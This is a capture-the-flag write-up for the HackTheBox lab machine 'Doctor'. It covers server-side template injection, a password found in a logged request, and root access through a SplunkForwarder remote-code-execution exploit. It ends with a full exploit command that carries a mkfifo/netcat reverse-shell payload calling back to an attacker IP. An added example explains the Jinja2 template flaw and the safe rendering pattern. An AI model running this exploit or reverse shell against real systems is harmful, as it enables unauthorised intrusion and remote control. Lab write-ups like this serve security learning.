Doctor — HackTheBox

y4th0ts
Feb 6, 2021

Summary

Doctor is an easy Linux box created by egotisticalSW. The initial foothold is found by fuzzing the ‘New Message’ form of the Doctor Secure Messaging page, and a reverse shell is spawned through Server-Side Template Injection. Lateral movement to the user ‘shaun’ is done by finding his password in a backup log file. Root privileges are obtained by exploiting SplunkForwarder, which is vulnerable to remote code execution/local privilege escalation.

Reconnaissance

Nmap discovered three open ports: 22 (ssh), 80 (http) and 8089 (Splunkd).

Visiting the HTTP service on port 80 displays a page for health care services. Clicking the contact button at the top right shows ‘doctors.htb’ as the domain.

Adding doctors.htb to the hosts file gives us access to a login page.

I tried common credentials but was unsuccessful. Clicking Sign Up Now lets us register a user.

Upon logging in, we see an empty page for what appears to be a secure messaging application.

Checking the source code reveals a directory called /archive, which is empty.

Server-Side Template Injection

Clicking New Message lets us create a new post. Fuzzing the form with {{7*7}} checks whether it is vulnerable to Server-Side Template Injection.

The injected string was not evaluated on the home page, but after checking /archive we can see that it was evaluated there.

Viewing the page source was needed for the evaluated output to be visible.
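To show why the same input can be rendered harmlessly in one view and evaluated in another, here is an added example that is not code from the box or this write-up. It assumes the application renders with Jinja2 (which the {{7*7}} syntax suggests, but the page does not confirm); the view functions are hypothetical.

```python
# Added example (not the box's code): the rendering mistake behind a {{7*7}}
# probe being evaluated, beside the safe way to render the same user input.
# Assumption: the app uses Jinja2; render_home/render_archive are hypothetical.
from jinja2 import Environment

# Autoescaping is on, but it only protects against HTML injection;
# it does nothing if user input ends up inside the template source itself.
env = Environment(autoescape=True)


def render_home(title: str) -> str:
    """Safe: the template source is fixed and the title arrives only as a
    context value, so {{ }} inside it stays literal text (and is escaped)."""
    template = env.from_string("<p>{{ title }}</p>")
    return template.render(title=title)


def render_archive(title: str) -> str:
    """Unsafe: the title is concatenated into the template source before
    parsing, so any template syntax it contains is evaluated by Jinja2."""
    template_source = "<item><title>" + title + "</title></item>"
    return env.from_string(template_source).render()


def probe_evaluated(probe: str, rendered: str) -> bool:
    """Regression check for a test suite: did the probe survive verbatim?"""
    return probe not in rendered


if __name__ == "__main__":
    probe = "{{7*7}}"  # constructed sample input, the same probe the post uses
    print(render_home(probe))     # {{7*7}} is still literal text here
    print(render_archive(probe))  # here it becomes 49
```

The fix for the archive view is the same as the home view: keep the template source constant and pass the post title as a context variable.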

I did not manage to exploit the vulnerability for code execution, so I tried other things. I noticed that if a link is provided, the server sends a request to it with curl.

After a lot of fuzzing, I finally found a payload that spawns a reverse shell.

Finding Password in Logs

After enumerating files and logs, I found something interesting. In /var/log/apache2/backup, a POST request to resetpassword was logged with ‘Guitar123’ in the email parameter. Since that is not an email address, someone probably typed their password into the email field instead of the password field.

I tried switching to the shaun user with the discovered password, and it worked.

Privilege Escalation

Enumerating further reveals splunkforwarder in the /opt directory. Looking up its version leads us to a GitHub repository with a remote code execution/local privilege escalation exploit.

Running the exploit with the necessary information gives us a reverse shell as root.

python3 PySplunkWhisperer2_remote.py --host doctors.htb --port 8089 --lhost 10.10.14.40 --username shaun --password Guitar123 --payload 'touch /tmp/f; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.40 9001 > /tmp/f'

That’s it for Doctor, thank you for reading, and have a good day all!